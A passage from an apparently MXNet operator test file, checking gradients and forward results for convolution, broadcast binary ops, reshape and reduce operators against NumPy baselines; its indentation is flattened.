'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv._bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv._bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
    d = gen_broadcast_data(idx)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
    d = gen_binary_data(dummy)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol._bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input a hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
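        # Collapse the full-shape gradient back to the input's shape by summing over the
        # axes where that input was broadcast.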
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol._bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
o = y.forward(is_train=True)
y.backward([mx.nd.array(out, dtype=o[0].dtype)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net._bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net._bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net._bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net._bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
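# Reshape special codes: 0 copies the input dim, -1 infers the dim, -2 copies all
# remaining input dims, -3 merges two consecutive dims, and -4 splits a dim into the
# two sizes that follow it.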
@pytest.mark.serial
@pytest.mark.parametrize('src_shape,shape_args,reverse,dst_shape', [
((2, 3, 5, 5), (0, -1), False, (2, 75)),
((2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)),
((5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)),
((2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)),
((2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)),
((2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)),
((2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)),
((2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)),
((2, 3, 5, 6), (-3, -3), False, (6, 30)),
((2, 3, 5, 6), (-3, -1), False, (6, 30)),
((64,), (-4, 16, 4), False, (16, 4)),
((64,), (-4, 16, -1), False, (16, 4)),
((64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)),
((2, 3, 5, 5), (0, -1), True, (5, 30)),
((2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)),
((5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)),
((2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)),
((2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)),
((2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)),
((2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)),
((2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)),
((2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)),
((2, 3, 5, 6), (-3, -3), True, (6, 30)),
((64,), (16, 4, -4), True, (16, 4)),
((64,), (16, -1, -4), True, (16, 4)),
((1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16))
])
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
def test_reshape_old():
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net._simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b._bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
# check forward
assert_almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, rtol=1e-4, atol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
# check backward
assert_almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, rtol=1e-4, atol=1e-4)
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
